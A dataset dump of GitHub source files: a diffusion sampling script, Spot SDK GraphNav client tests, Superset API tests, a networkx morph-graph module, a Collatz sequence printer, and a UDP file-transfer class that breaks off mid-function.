{"seq_id":"71010073796","text":"import argparse\nimport importlib\nfrom v_diffusion import make_beta_schedule\nfrom moving_average import init_ema_model\nfrom torch.utils.tensorboard import SummaryWriter\nfrom copy import deepcopy\nimport torch\nimport os\nfrom train_utils import make_visualization\nimport cv2\n\n\ndef make_argument_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--module\", help=\"Model module.\", type=str, required=True)\n parser.add_argument(\"--checkpoint\", help=\"Path to checkpoint.\", type=str, default=\"\")\n parser.add_argument(\"--out_file\", help=\"Path to image.\", type=str, default=\"\")\n parser.add_argument(\"--batch_size\", help=\"Batch size.\", type=int, default=1)\n parser.add_argument(\"--diffusion\", help=\"Diffusion model.\", type=str, default=\"GaussianDiffusion\")\n parser.add_argument(\"--time_scale\", help=\"Diffusion time scale.\", type=int, default=1)\n parser.add_argument(\"--clipped_sampling\", help=\"Use clipped sampling mode.\", type=bool, default=False)\n parser.add_argument(\"--clipping_value\", help=\"Noise clipping value.\", type=float, default=1.2)\n parser.add_argument(\"--eta\", help=\"Amount of random noise in clipping sampling mode(recommended non-zero values only for not distilled model).\", type=float, default=0)\n return parser\n\ndef sample_images_5000(args, make_model):\n device = torch.device(\"cuda\")\n\n teacher_ema = make_model().to(device)\n\n def make_diffusion(args, model, n_timestep, time_scale, device):\n betas = make_beta_schedule(\"cosine\", cosine_s=8e-3, n_timestep=n_timestep).to(device)\n M = importlib.import_module(\"v_diffusion\")\n D = getattr(M, args.diffusion) # which type of diffusion?\n sampler = \"ddpm\"\n if args.clipped_sampling:\n sampler = \"clipped\"\n return D(model, betas, time_scale=time_scale, sampler=sampler)\n\n teacher = make_model().to(device) # teacher is a UNet object, not yet a diffusion object\n\n ckpt = torch.load(args.checkpoint) # load the checkpoint\n teacher.load_state_dict(ckpt[\"G\"]) # G holds all the model parameters\n n_timesteps = ckpt[\"n_timesteps\"]//args.time_scale # n_timesteps is the number of sampling steps\n time_scale = 
ckpt[\"time_scale\"]*args.time_scale # 一个时间步长的大小\n del ckpt # 参数传完,删掉\n print(\"Model loaded.\")\n\n teacher_diffusion = make_diffusion(args, teacher, n_timesteps, time_scale, device) # 这是一个diffusion对象\n image_size = deepcopy(teacher.image_size)\n image_size[0] = 1\n \n for i in range(10):\n print(f\"{i+1}/5000\")\n img = make_visualization(teacher_diffusion, device, image_size, need_tqdm=True, eta=args.eta, clip_value=args.clipping_value)\n if img.shape[2] == 1:\n img = img[:, :, 0]\n filename = os.path.join(\"images/celeba/base_0\", f\"celeba_full_0_{i:04}.png\")\n cv2.imwrite(filename, img)\n\n print(\"Finished.\")\n\nparser = make_argument_parser() # 创建一个ArgumentParser对象\n\nargs = parser.parse_args() # 解析parser对象中的命令行参数,参数存在args对象中\n\nM = importlib.import_module(args.module) # 导入命令行参数module指定的模块\nmake_model = getattr(M, \"make_model\") # 从celeba_u.py中获取make_model属性,里面定义了网络的架构\n\nsample_images_5000(args, make_model) # 把其他命令行参数和celeba_u对应的网络架构相关的参数传入采样函数\n","repo_name":"DannieSYD/Diffusion_Distillation","sub_path":"sample_5000.py","file_name":"sample_5000.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13035641993","text":"import concurrent\n\nimport grpc\nimport pytest\n\nimport bosdyn.client.graph_nav\nfrom bosdyn.api import header_pb2, lease_pb2, time_sync_pb2\nfrom bosdyn.api.graph_nav import graph_nav_pb2, graph_nav_service_pb2_grpc, map_pb2, nav_pb2\nfrom bosdyn.client.exceptions import InternalServerError, UnsetStatusError\nfrom bosdyn.client.graph_nav import GraphNavClient, UnrecognizedCommandError\nfrom bosdyn.client.time_sync import TimeSyncEndpoint\n\n\nclass MockGraphNavServicer(graph_nav_service_pb2_grpc.GraphNavServiceServicer):\n \"\"\"GraphNav servicer for testing.\n\n Provides simple, controllable implementations of certain RPCs.\n \"\"\"\n\n def __init__(self):\n super(MockGraphNavServicer, self).__init__()\n self.common_header_code = header_pb2.CommonError.CODE_OK\n self.nav_feedback_status = graph_nav_pb2.NavigationFeedbackResponse.STATUS_REACHED_GOAL\n self.modify_navigation_status = graph_nav_pb2.ModifyNavigationResponse.STATUS_OK\n self.nav_to_resp = graph_nav_pb2.NavigateToResponse(\n status=graph_nav_pb2.NavigateToResponse.STATUS_OK)\n self.nav_route_resp = graph_nav_pb2.NavigateRouteResponse(\n status=graph_nav_pb2.NavigateRouteResponse.STATUS_OK)\n self.upload_waypoint_resp = graph_nav_pb2.UploadWaypointSnapshotResponse()\n self.upload_edge_resp = graph_nav_pb2.UploadEdgeSnapshotResponse()\n self.set_loc_resp = graph_nav_pb2.SetLocalizationResponse(\n status=graph_nav_pb2.SetLocalizationResponse.STATUS_OK)\n self.upload_graph_resp = graph_nav_pb2.UploadGraphResponse(\n status=graph_nav_pb2.UploadGraphResponse.STATUS_OK)\n self.download_wp_snapshot_status = graph_nav_pb2.DownloadWaypointSnapshotResponse.STATUS_OK\n self.download_edge_snapshot_status = graph_nav_pb2.DownloadEdgeSnapshotResponse.STATUS_OK\n self.lease_use_result = None\n\n def SetLocalization(self, request, context):\n resp = graph_nav_pb2.SetLocalizationResponse()\n resp.CopyFrom(self.set_loc_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def NavigateRoute(self, request, context):\n resp = graph_nav_pb2.NavigateRouteResponse()\n resp.CopyFrom(self.nav_route_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n 
resp.lease_use_results.add().CopyFrom(self.lease_use_result)\n return resp\n\n def NavigateTo(self, request, context):\n resp = graph_nav_pb2.NavigateToResponse()\n resp.CopyFrom(self.nav_to_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_results.add().CopyFrom(self.lease_use_result)\n return resp\n\n def ClearGraph(self, request, context):\n resp = graph_nav_pb2.ClearGraphResponse()\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def UploadGraph(self, request, context):\n resp = graph_nav_pb2.UploadGraphResponse()\n resp.CopyFrom(self.upload_graph_resp)\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def UploadWaypointSnapshot(self, request_iterator, context):\n resp = graph_nav_pb2.UploadWaypointSnapshotResponse()\n resp.status = graph_nav_pb2.UploadWaypointSnapshotResponse.STATUS_OK\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def UploadEdgeSnapshot(self, request_iterator, context):\n resp = graph_nav_pb2.UploadEdgeSnapshotResponse()\n resp.header.error.code = self.common_header_code\n if self.lease_use_result:\n resp.lease_use_result.CopyFrom(self.lease_use_result)\n return resp\n\n def NavigationFeedback(self, request, context):\n \"\"\"Specific NavigationFeedback responses.\"\"\"\n resp = graph_nav_pb2.NavigationFeedbackResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.nav_feedback_status\n return resp\n\n def ModifyNavigation(self, request, context):\n resp = graph_nav_pb2.ModifyNavigationResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.modify_navigation_status\n return resp\n\n def DownloadWaypointSnapshot(self, request, context):\n resp = graph_nav_pb2.DownloadWaypointSnapshotResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.download_wp_snapshot_status\n yield resp\n\n def DownloadEdgeSnapshot(self, request, context):\n resp = graph_nav_pb2.DownloadEdgeSnapshotResponse()\n resp.header.error.code = self.common_header_code\n resp.status = self.download_edge_snapshot_status\n yield resp\n\n\n@pytest.fixture\ndef client(time_sync):\n c = GraphNavClient()\n c._timesync_endpoint = time_sync\n return c\n\n\n@pytest.fixture\ndef service():\n return MockGraphNavServicer()\n\n\n@pytest.fixture\ndef time_sync():\n ts = TimeSyncEndpoint(None)\n ts._locked_previous_response = time_sync_pb2.TimeSyncUpdateResponse()\n ts.response.state.status = time_sync_pb2.TimeSyncState.STATUS_OK\n return ts\n\n\n@pytest.fixture\ndef server(client, service):\n server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=1))\n graph_nav_service_pb2_grpc.add_GraphNavServiceServicer_to_server(service, server)\n port = server.add_insecure_port('localhost:0')\n channel = grpc.insecure_channel('localhost:{}'.format(port))\n client.channel = channel\n server.start()\n yield server\n server.stop(0)\n\n\n@pytest.mark.parametrize('func', ('navigation_feedback_async', 'navigation_feedback'))\ndef test_feedback_exceptions(client, service, server, func):\n \"\"\"Client's navigation feedback should provide expected exceptions/responses.\"\"\"\n\n if 'async' in func:\n call = lambda: getattr(client, func)().result()\n else:\n call = getattr(client, 
func)\n\n # Service starts with valid status codes.\n resp = call()\n assert resp.status == service.nav_feedback_status\n\n # Check every non-unknown status code -- they should all be OK.\n for _, value in graph_nav_pb2.NavigationFeedbackResponse.Status.items():\n # Skip the unset/UNKNOWN value.\n if value == 0:\n continue\n service.nav_feedback_status = value\n assert call().status == value\n\n # UNKNOWN should cause an exception.\n service.nav_feedback_status = graph_nav_pb2.NavigationFeedbackResponse.STATUS_UNKNOWN\n with pytest.raises(UnsetStatusError):\n call()\n\n # Errors in the common header should cause an exception.\n service.common_header_code = header_pb2.CommonError.CODE_INTERNAL_SERVER_ERROR\n with pytest.raises(InternalServerError):\n call()\n\n\n\n\ndef test_navigate_to_exceptions(client, service, server):\n make_call = lambda: client.navigate_to('somewhere-id', 2.0)\n cmd_id = make_call()\n assert type(cmd_id) is int\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n cmd_id = make_call()\n assert type(cmd_id) is int\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_NO_TIMESYNC\n with pytest.raises(bosdyn.client.graph_nav.NoTimeSyncError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_EXPIRED\n with pytest.raises(bosdyn.client.graph_nav.CommandExpiredError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_TOO_DISTANT\n with pytest.raises(bosdyn.client.graph_nav.TooDistantError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_ROBOT_IMPAIRED\n with pytest.raises(bosdyn.client.graph_nav.RobotImpairedError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_RECORDING\n with pytest.raises(bosdyn.client.graph_nav.IsRecordingError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_UNKNOWN_WAYPOINT\n with pytest.raises(bosdyn.client.graph_nav.UnknownWaypointError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_NO_PATH\n with pytest.raises(bosdyn.client.graph_nav.NoPathError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_FEATURE_DESERT\n with pytest.raises(bosdyn.client.graph_nav.FeatureDesertError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_LOST\n with pytest.raises(bosdyn.client.graph_nav.RobotLostError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_NOT_LOCALIZED_TO_MAP\n with pytest.raises(bosdyn.client.graph_nav.RobotNotLocalizedToRouteError):\n make_call()\n\n service.nav_to_resp.status = service.nav_to_resp.STATUS_COULD_NOT_UPDATE_ROUTE\n with pytest.raises(bosdyn.client.graph_nav.RouteNotUpdatingError):\n make_call()\n\n\ndef test_navigate_route_exceptions(client, service, server):\n make_call = lambda: client.navigate_route(nav_pb2.Route(), 2.0)\n cmd_id = make_call()\n assert cmd_id == 0\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n cmd_id = make_call()\n assert type(cmd_id) is int\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_NO_TIMESYNC\n with 
pytest.raises(bosdyn.client.graph_nav.NoTimeSyncError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_EXPIRED\n with pytest.raises(bosdyn.client.graph_nav.CommandExpiredError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_TOO_DISTANT\n with pytest.raises(bosdyn.client.graph_nav.TooDistantError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_ROBOT_IMPAIRED\n with pytest.raises(bosdyn.client.graph_nav.RobotImpairedError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_RECORDING\n with pytest.raises(bosdyn.client.graph_nav.IsRecordingError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_UNKNOWN_ROUTE_ELEMENTS\n with pytest.raises(bosdyn.client.graph_nav.UnknownRouteElementsError):\n make_call()\n #make sure the misspelled error works for backwards compatibility.\n with pytest.raises(bosdyn.client.graph_nav.UnkownRouteElementsError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_INVALID_EDGE\n with pytest.raises(bosdyn.client.graph_nav.InvalidEdgeError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_CONSTRAINT_FAULT\n with pytest.raises(bosdyn.client.graph_nav.ConstraintFaultError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_FEATURE_DESERT\n with pytest.raises(bosdyn.client.graph_nav.FeatureDesertError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_LOST\n with pytest.raises(bosdyn.client.graph_nav.RobotLostError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_NOT_LOCALIZED_TO_ROUTE\n with pytest.raises(bosdyn.client.graph_nav.RobotNotLocalizedToRouteError):\n make_call()\n\n service.nav_route_resp.status = service.nav_route_resp.STATUS_COULD_NOT_UPDATE_ROUTE\n with pytest.raises(bosdyn.client.graph_nav.RouteNotUpdatingError):\n make_call()\n\n\ndef test_clear_graph(client, service, server):\n make_call = lambda: client.clear_graph()\n\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n\ndef test_upload_graph_exceptions(client, service, server):\n make_call = lambda: client.upload_graph(graph=map_pb2.Graph())\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n make_call()\n\n service.upload_graph_resp.status = service.upload_graph_resp.STATUS_MAP_TOO_LARGE_LICENSE\n with pytest.raises(bosdyn.client.graph_nav.MapTooLargeLicenseError):\n make_call()\n\n service.upload_graph_resp.status = service.upload_graph_resp.STATUS_INVALID_GRAPH\n with pytest.raises(bosdyn.client.graph_nav.InvalidGraphError):\n make_call()\n\n\ndef test_upload_waypoint_exceptions(client, service, server):\n make_call = lambda: client.upload_waypoint_snapshot(map_pb2.WaypointSnapshot())\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n\ndef test_upload_edge_exceptions(client, service, server):\n make_call = lambda: client.upload_edge_snapshot(map_pb2.EdgeSnapshot())\n make_call()\n\n 
service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n\ndef test_set_localization_exceptions(client, service, server):\n make_call = lambda: client.set_localization(nav_pb2.Localization())\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(\n status=lease_pb2.LeaseUseResult.STATUS_OLDER)\n with pytest.raises(bosdyn.client.LeaseUseError):\n make_call()\n\n service.lease_use_result = lease_pb2.LeaseUseResult(status=lease_pb2.LeaseUseResult.STATUS_OK)\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_ROBOT_IMPAIRED\n with pytest.raises(bosdyn.client.graph_nav.RobotFaultedError):\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_UNKNOWN_WAYPOINT\n with pytest.raises(bosdyn.client.graph_nav.UnknownMapInformationError):\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_ABORTED\n with pytest.raises(bosdyn.client.graph_nav.RequestAbortedError):\n make_call()\n\n service.set_loc_resp.status = service.set_loc_resp.STATUS_FAILED\n with pytest.raises(bosdyn.client.graph_nav.RequestFailedError):\n make_call()\n\n\ndef test_download_waypoint_snapshot(client, service, server):\n make_call = lambda: client.download_waypoint_snapshot(waypoint_snapshot_id=\"mywaypoint\")\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_INTERNAL_SERVER_ERROR\n with pytest.raises(InternalServerError):\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_OK\n service.download_wp_snapshot_status = graph_nav_pb2.DownloadWaypointSnapshotResponse.STATUS_SNAPSHOT_DOES_NOT_EXIST\n with pytest.raises(bosdyn.client.graph_nav.UnknownMapInformationError):\n make_call()\n\n\ndef test_download_edge_snapshot(client, service, server):\n make_call = lambda: client.download_edge_snapshot(edge_snapshot_id=\"myedge\")\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_INTERNAL_SERVER_ERROR\n with pytest.raises(InternalServerError):\n make_call()\n\n service.common_header_code = header_pb2.CommonError.CODE_OK\n service.download_edge_snapshot_status = graph_nav_pb2.DownloadEdgeSnapshotResponse.STATUS_SNAPSHOT_DOES_NOT_EXIST\n with pytest.raises(bosdyn.client.graph_nav.UnknownMapInformationError):\n make_call()\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/tests/test_graph_nav_client.py","file_name":"test_graph_nav_client.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"25168416315","text":"import json\nimport prison\n\nfrom superset.utils.core import get_example_default_schema\n\nfrom tests.integration_tests.utils.get_dashboards import get_dashboards_ids\nfrom unittest import mock\nfrom sqlalchemy import Column\nfrom typing import Any\nfrom superset.advanced_data_type.types import (\n AdvancedDataType,\n AdvancedDataTypeRequest,\n AdvancedDataTypeResponse,\n)\nfrom superset.utils.core import FilterOperator, FilterStringOperators\n\n\ntarget_resp: AdvancedDataTypeResponse = {\n \"values\": [],\n \"error_message\": \"\",\n \"display_value\": \"\",\n \"valid_filter_operators\": [\n FilterStringOperators.EQUALS,\n FilterStringOperators.GREATER_THAN_OR_EQUAL,\n FilterStringOperators.GREATER_THAN,\n FilterStringOperators.IN,\n FilterStringOperators.LESS_THAN,\n FilterStringOperators.LESS_THAN_OR_EQUAL,\n ],\n}\n\n\ndef 
translation_func(req: AdvancedDataTypeRequest) -> AdvancedDataTypeResponse:\n return target_resp\n\n\ndef translate_filter_func(col: Column, op: FilterOperator, values: list[Any]):\n pass\n\n\ntest_type: AdvancedDataType = AdvancedDataType(\n verbose_name=\"type\",\n valid_data_types=[\"int\"],\n translate_type=translation_func,\n description=\"\",\n translate_filter=translate_filter_func,\n)\n\nCHART_DATA_URI = \"api/v1/chart/advanced_data_type\"\nCHARTS_FIXTURE_COUNT = 10\n\n\n@mock.patch(\n \"superset.advanced_data_type.api.ADVANCED_DATA_TYPES\",\n {\"type\": 1},\n)\ndef test_types_type_request(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test to see if the API call returns all the valid advanced data types\n \"\"\"\n uri = f\"api/v1/advanced_data_type/types\"\n response_value = test_client.get(uri)\n data = json.loads(response_value.data.decode(\"utf-8\"))\n assert response_value.status_code == 200\n assert data == {\"result\": [\"type\"]}\n\n\ndef test_types_convert_bad_request_no_vals(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when no values are passed\n \"\"\"\n arguments = {\"type\": \"type\", \"values\": []}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 400\n\n\ndef test_types_convert_bad_request_no_type(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when no type is passed\n \"\"\"\n arguments = {\"type\": \"\", \"values\": [1]}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 400\n\n\n@mock.patch(\n \"superset.advanced_data_type.api.ADVANCED_DATA_TYPES\",\n {\"type\": 1},\n)\ndef test_types_convert_bad_request_type_not_found(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when passed in type is\n not found/not valid\n \"\"\"\n arguments = {\"type\": \"not_found\", \"values\": [1]}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 400\n\n\n@mock.patch(\n \"superset.advanced_data_type.api.ADVANCED_DATA_TYPES\",\n {\"type\": test_type},\n)\ndef test_types_convert_request(test_client, login_as_admin):\n \"\"\"\n Advanced Data Type API: Test request to see if it behaves as expected when a valid type\n and valid values are passed in\n \"\"\"\n arguments = {\"type\": \"type\", \"values\": [1]}\n uri = f\"api/v1/advanced_data_type/convert?q={prison.dumps(arguments)}\"\n response_value = test_client.get(uri)\n assert response_value.status_code == 200\n data = json.loads(response_value.data.decode(\"utf-8\"))\n assert data == {\"result\": target_resp}\n","repo_name":"apache/superset","sub_path":"tests/integration_tests/advanced_data_type/api_tests.py","file_name":"api_tests.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"17204262367","text":"from contextlib import contextmanager\nfrom itertools import pairwise\nfrom os import PathLike\nfrom pathlib import Path\nfrom typing import Any, BinaryIO, Iterable, Iterator\n\nimport networkx as nx\n\nfrom .._magic import MediumSpec\nfrom ..errors import PilusMissingMorpherError\nfrom ._morph import Morpher, MorphFunc, 
ShapeSpec\n\n\nclass MorphGraph:\n \"\"\"Graph of available morphs.\"\"\"\n\n def __init__(self) -> None:\n # Nodes are of type: `ShapeSpec`\n # Edges are of type: `MorphFunc`\n self._graph = nx.DiGraph()\n\n def add_morpher(self, morpher: Morpher) -> None:\n \"\"\"Add nodes and edge that corresponds the given morpher to this graph.\n\n Removes the existing edge (if any).\n \"\"\"\n # Remove existing edge (if any)\n try:\n self._graph.remove_edge(morpher.input, morpher.output)\n except nx.NetworkXError:\n pass\n # Add new edge\n self._graph.add_edge(morpher.input, morpher.output, func=morpher.func)\n # Generate edges\n if isinstance(morpher.input, MediumSpec):\n self._generate_edges_to_medium_spec(morpher.input)\n\n def _generate_edges_to_medium_spec(self, spec: MediumSpec) -> None:\n if spec.raw_type is BinaryIO:\n path_to_io = Morpher(\n input=MediumSpec(raw_type=PathLike, media_type=spec.media_type),\n output=spec,\n func=_file_to_io,\n )\n self._add_morpher_if_not_exists(path_to_io)\n elif spec.raw_type is bytes:\n path_to_io = Morpher(\n input=MediumSpec(raw_type=PathLike, media_type=spec.media_type),\n output=MediumSpec(raw_type=BinaryIO, media_type=spec.media_type),\n func=_file_to_io,\n )\n self._add_morpher_if_not_exists(path_to_io)\n io_to_data = Morpher(\n input=MediumSpec(raw_type=BinaryIO, media_type=spec.media_type),\n output=MediumSpec(raw_type=bytes, media_type=spec.media_type),\n func=_io_to_data,\n )\n self._add_morpher_if_not_exists(io_to_data)\n\n def _add_morpher_if_not_exists(self, morpher: Morpher) -> None:\n # Early out if the edge already exists\n try:\n self._graph[morpher.input][morpher.output]\n except KeyError:\n pass\n else:\n return\n # Add new edge\n self._graph.add_edge(morpher.input, morpher.output, func=morpher.func)\n\n def get_morphs(\n self, in_spec: ShapeSpec, out_spec: ShapeSpec\n ) -> Iterator[MorphFunc]:\n \"\"\"Return morph functions that morphs `in_spec` into `out_spec`.\"\"\"\n # We find the shortest sequence of morphs that takes\n # us from the source type into the destination type.\n try:\n path: list[Any] = nx.shortest_path(self._graph, in_spec, out_spec)\n except nx.NodeNotFound as exc:\n raise PilusMissingMorpherError(\n f'Can not find morph chain that converts from \"{in_spec}\" to'\n f' \"{out_spec}\"'\n ) from exc\n return self._path_to_morph_funcs(path)\n\n def _path_to_morph_funcs(self, path: Iterable[Any]) -> Iterator[MorphFunc]:\n for edge in pairwise(path):\n yield self._graph[edge[0]][edge[1]][\"func\"]\n\n def spec_to_type(self, spec: ShapeSpec) -> type:\n try:\n for edge in nx.dfs_edges(self._graph, spec):\n target_node = edge[1]\n if not isinstance(target_node, MediumSpec):\n assert isinstance(target_node, type)\n return target_node\n except KeyError:\n pass\n raise ValueError(\n \"Could not find type that corresponds to the given shape specification\"\n )\n\n\n@contextmanager\ndef _file_to_io(file: Path) -> Iterator[BinaryIO]:\n with file.open(\"rb\") as io:\n yield io\n\n\ndef _io_to_data(io: BinaryIO) -> bytes:\n return io.read()\n","repo_name":"sbtinstruments/pilus","sub_path":"pilus/forge/_morph_graph.py","file_name":"_morph_graph.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3596598782","text":"import time\r\nimport webbrowser\r\n\r\ngreeting = input(\"Welcome to the 3x + 1 (or Collatz Conjecture) number generator.\\nFor a start, do you know what is the Collatz Conjecture? 
(Yes/No) \")\r\nif greeting.upper() == \"YES\":\r\n print(\"Great! Let's continue!\")\r\nelif greeting.upper() == \"NO\":\r\n webbrowser.open(\"https://en.wikipedia.org/wiki/Collatz_conjecture\")\r\n time.sleep(3)\r\n print(\"Have you understood? Let's continue!\")\r\nelse:\r\n print(\"Invalid input. Sorry!\")\r\nx = int(input(\"Enter the starting number: \"))\r\ndelay = input(\"Enter the delay time between numbers (in seconds): \")\r\nhighestnumber = 0\r\nruntime = 0\r\nhighestnumbertime = 0\r\n\r\nprint(str(x))\r\nwhile x != 1:\r\n if x > highestnumber:\r\n highestnumber = x\r\n highestnumbertime = runtime\r\n if x % 2 == 0:\r\n x = x / 2\r\n else:\r\n x = 3 * x + 1\r\n print(str(int(x)))\r\n runtime += 1\r\n time.sleep(float(delay))\r\n\r\nprint(\"The highest number was \" + str(int(highestnumber)) + \". It was reached at number \" + str(int(highestnumbertime) + 1) + \".\")\r\nprint(str(int(runtime) + 1) + \" numbers were generated until the number reached 1, including 1.\")\r\n","repo_name":"jiaqichen2010/math-programs","sub_path":"3x+1 generator.py","file_name":"3x+1 generator.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39207270827","text":"from socket import *\nfrom os import listdir\n\nclass Udp:\n def __init__(self, opcao, port = None):\n self.port = port\n self.control = socket(AF_INET, SOCK_DGRAM)\n if opcao == 'server' and port != None:\n self.control.bind(('', self.port))\n self.control.settimeout(5.0)\n\n self.report = 'FINISH'\n\n def receber(self, bytes = None):\n tentativa = 0\n mensagem = None\n endereco = ('0', 0)\n while tentativa < 3 and mensagem == None:\n try:\n mensagem, endereco = self.control.recvfrom(2048)\n if bytes == None:\n mensagem = mensagem.decode()\n print(f\"RECEBENDO MENSAGEM {mensagem}\")\n self.control.sendto(b\"ACK 0\", endereco)\n print(f\"ENVIANDO ACK 0\")\n else:\n resposta = \"ACK \" + str(bytes + len(mensagem))\n print(f\"RECEBENDO {resposta}\")\n self.control.sendto(resposta.encode(), endereco)\n except:\n tentativa += 1\n return (mensagem, ) + endereco\n\n def responder(self, mensagem, endereco, bytes = None):\n resultado = \"FAIL\"\n tentativa = 0\n while resultado == \"FAIL\" and tentativa < 3:\n try:\n if bytes == None:\n print(f\"ENVIANDO MENSAGEM {mensagem}\")\n self.control.sendto(mensagem.encode(), endereco)\n else:\n print(f\"ENVIANDO PARTE ARQUIVO\")\n self.control.sendto(mensagem, endereco)\n mensagem, address = self.control.recvfrom(2048)\n resultado, ack = mensagem.decode().split()\n print(f\"RECEBENDO {resultado} {ack}\")\n if resultado == \"ACK\" and endereco == address and (bytes == None or ack == bytes):\n resultado = 'FINISH'\n else:\n tentativa += 1\n except:\n tentativa += 1\n return resultado\n \n def enviarPasta(self, pasta, destino):\n self.report = \"FINISH\"\n try:\n nomes = listdir(pasta)\n for arquivo in nomes:\n self.responder(\"NAME \"+pasta+\"/\"+arquivo, destino)\n self.enviarArquivo(pasta+\"/\"+arquivo, destino)\n if self.report.split()[0] != \"FINISH\":\n break\n except:\n if self.report.split()[0] != \"FAIL\":\n self.report = \"FAIL FOLDER\"\n finally:\n self.responder(\"CLOSE CONN\", destino)\n\n def enviarArquivo(self, path, destino):\n self.report = \"FINISH\"\n ack = 0\n try:\n arquivo = open(path, 'rb')\n except:\n self.report = \"FAIL FILE\"\n\n if self.report == \"FINISH\":\n try:\n parte = arquivo.read(2048)\n ack += len(parte)\n while parte:\n ack = self.responder(parte, destino, str(ack))\n 
